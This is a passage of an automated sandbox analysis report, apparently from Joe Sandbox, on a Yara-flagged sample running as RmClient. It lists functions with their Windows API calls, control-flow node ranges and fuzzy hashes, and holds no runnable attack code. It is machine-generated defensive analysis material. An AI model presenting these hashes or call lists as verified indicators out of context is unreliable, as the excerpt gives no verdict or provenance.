                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: 4496963ff81daae8c4e050f592e5ffa739b6b8dc2b2086e21c23d605cee49869
                                                                                                                      • Instruction ID: fbc3af9c00e220659403bbc9bdc64d15db407dda8940dac5e37481b8535621d4
                                                                                                                      • Opcode Fuzzy Hash: 4496963ff81daae8c4e050f592e5ffa739b6b8dc2b2086e21c23d605cee49869
                                                                                                                      • Instruction Fuzzy Hash: C511C272D4025D7EEF10DAA09C85DEFBF7CEF913A8F048064F918A7241D2695E0687A1
                                                                                                                      Function 00530A10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 568 530a10-530a22 569 530a2a-530a7a call 54bbc0 call 5341d0 call 521410 call 5418c0 568->569 570 530a25 call 54b1b0 568->570 579 530a9a-530aa0 569->579 580 530a7c-530a8b PostThreadMessageW 569->580 570->569 580->579 581 530a8d-530a97 580->581 581->579
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 00530A87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: 6d98e36d58be551e4f06ac56f9a6ae9f16aec90b9d66c54e3891da6bc62aa6d9
                                                                                                                      • Instruction ID: b4f1c70d30869556dc8bbd0cc13105f83fd68dab1d8faf217205179fd43fa848
                                                                                                                      • Opcode Fuzzy Hash: 6d98e36d58be551e4f06ac56f9a6ae9f16aec90b9d66c54e3891da6bc62aa6d9
                                                                                                                      • Instruction Fuzzy Hash: B401C472D0025D7AEF10EAE09C85DEFBF7CEF81398F008065F90467141E6749E0687A1
                                                                                                                      Function 0053F19C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeUninitialize
                                                                                                                      • String ID: @J7<
                                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                                      • Opcode ID: 820045f0e54815265ef8cfa34ec5def86a9d299a782aef65bd96770867440a54
                                                                                                                      • Instruction ID: 9fd347d29fd72ddf4dd2b34bf8c5529c8ae49de2752f400a33a7d25d5ee51774
                                                                                                                      • Opcode Fuzzy Hash: 820045f0e54815265ef8cfa34ec5def86a9d299a782aef65bd96770867440a54
                                                                                                                      • Instruction Fuzzy Hash: 4E311DB9A0060AAFDB00DFD8DC809EFB7B9BF88304F108559F515AB214D775EE458BA0
                                                                                                                      Function 0053F1A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeUninitialize
                                                                                                                      • String ID: @J7<
                                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                                      • Opcode ID: 17288157ecd1c6762428be00133c07c2a5cfd08cff1082ec98bee9e619f81e42
                                                                                                                      • Instruction ID: 0ee86a146d64eb37663700ec8d7895e10a2b3278eae497fcab001c93a36c80b3
                                                                                                                      • Opcode Fuzzy Hash: 17288157ecd1c6762428be00133c07c2a5cfd08cff1082ec98bee9e619f81e42
                                                                                                                      • Instruction Fuzzy Hash: 20310EB9A0060AAFDB10DFD8DC809EFB7B9BF88304F108559E515EB214D775EE458BA0
                                                                                                                      Function 005341D0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00534242
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: fd445b3584a097885adeaa8222717d59799b4ecacb9126208c7b208bd7e5c741
                                                                                                                      • Instruction ID: 8f06a9e10128aa667431a765b5ce0def7463ad37b3a17a7d55c1bc2398335f13
                                                                                                                      • Opcode Fuzzy Hash: fd445b3584a097885adeaa8222717d59799b4ecacb9126208c7b208bd7e5c741
                                                                                                                      • Instruction Fuzzy Hash: 4A011EB5E4020EABDF10DAE4DC46FDEBB78AB94308F0041A5F908A7241F671EB54CB91
                                                                                                                      Function 00549480 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,00537FAE,00000010,?,?,?,00000044,?,00000010,00537FAE,?,?,?), ref: 005494E3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      • Opcode ID: 8593080f28c7da2d4c7341f4996bc03bd739627dce55732c6d6f6df8e2c725bd
                                                                                                                      • Instruction ID: 7a11c0f6ed7bcc9f795f5461a88af5d1cc5d79fa342671f29523ccceb2be23f5
                                                                                                                      • Opcode Fuzzy Hash: 8593080f28c7da2d4c7341f4996bc03bd739627dce55732c6d6f6df8e2c725bd
                                                                                                                      • Instruction Fuzzy Hash: 4D01D2B2214209BFDB44DE89DC91EEB77ADAFCC714F418108BA09E3241D670F8518BA4
                                                                                                                      Function 005299A0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005299E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: 19377e8cb0ef9a5e3e41e9500f88fb736127325c76e94d543986e8a2c92014f4
                                                                                                                      • Instruction ID: 726cc547b62f84bf022621854eca33f1138e6f2cc8556dc6393f313722aef0ec
                                                                                                                      • Opcode Fuzzy Hash: 19377e8cb0ef9a5e3e41e9500f88fb736127325c76e94d543986e8a2c92014f4
                                                                                                                      • Instruction Fuzzy Hash: BFF0653338071436D66071A9AC02FD7BB9CDFC1765F140425F60CEB2C1D991B84146E8
                                                                                                                      Function 0052999A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005299E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: 5a0839990e32f97e0ab61ba7688f7b728a3a034155104831b702acf02cbcb0ac
                                                                                                                      • Instruction ID: 70b7cbc230be60003600fb10a8c68464fa9054ad1cde067b9107f45ae584a0fd
                                                                                                                      • Opcode Fuzzy Hash: 5a0839990e32f97e0ab61ba7688f7b728a3a034155104831b702acf02cbcb0ac
                                                                                                                      • Instruction Fuzzy Hash: C4F092336906107AD67076B8DC47FDB7B9CAFD1790F100218FA0CAB2C1DAA1784187E8
                                                                                                                      Function 005493F0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,E8560001,00000007,00000000,00000004,00000000,00533A5A,000000F4), ref: 0054942C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 78ea8d3e74bb12d0c99bfe25a8a4523d6cf168d0823e9178060a443b9b02b838
                                                                                                                      • Instruction ID: 9587b119693b2deb6f11a5740e74c72beb564101eb86e729b680a6c4430bba83
                                                                                                                      • Opcode Fuzzy Hash: 78ea8d3e74bb12d0c99bfe25a8a4523d6cf168d0823e9178060a443b9b02b838
                                                                                                                      • Instruction Fuzzy Hash: 54E09AB62042197BDA10EEA8DC45FDB77ACEFC9710F004419FA09A7282D770BC108BB9
                                                                                                                      Function 005493A0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(005316B9,?,?,005316B9,_ST,?,?,005316B9,_ST,00001000,?,?,00000000), ref: 005493DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 91abb7d82ffbb300c834860f9915abda1e087af3534362ab768425a334786e76
                                                                                                                      • Instruction ID: 5d7dd349159040727d6fb0c19afad76ed85cf78bf9ebf5fae2b8f47c67d0394c
                                                                                                                      • Opcode Fuzzy Hash: 91abb7d82ffbb300c834860f9915abda1e087af3534362ab768425a334786e76
                                                                                                                      • Instruction Fuzzy Hash: 00E06D722142057BD610EF58DC55EDB37ACEFC9710F404419F908A7242C670B91087B9
                                                                                                                      Function 00537DD8 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,005319B0,00547C9F,_ST,00531973), ref: 00537E13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: 70cc7cdbc862f2811f1b1a5b182a7837848f04cd2249be44bb2b261463e454d7
                                                                                                                      • Instruction ID: 114c5a9b84b2a850edd6a07733dfccff3b485efe48aa61fc203994e02ef5b1c0
                                                                                                                      • Opcode Fuzzy Hash: 70cc7cdbc862f2811f1b1a5b182a7837848f04cd2249be44bb2b261463e454d7
                                                                                                                      • Instruction Fuzzy Hash: 06E0C27128030477EA50A6B0CC07FAB3B9CAB55794F0444ACBA4CDB2C3E854E4408795
                                                                                                                      Function 00537DE0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,005319B0,00547C9F,_ST,00531973), ref: 00537E13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: 29b053cd21aa9540a67af0be94abb3cbadae4ccb617b84b93386a6a2f781ee3b
                                                                                                                      • Instruction ID: 412eee01ae02ddd0140f00a97ecd7dcf6b01e70d3d209fe8faf87d4ac06f6065
                                                                                                                      • Opcode Fuzzy Hash: 29b053cd21aa9540a67af0be94abb3cbadae4ccb617b84b93386a6a2f781ee3b
                                                                                                                      • Instruction Fuzzy Hash: B9D05EB26807097BFA50A6F4DC07F6B378CAB54798F1444A4BA0CEB3C3ED55F4504AA9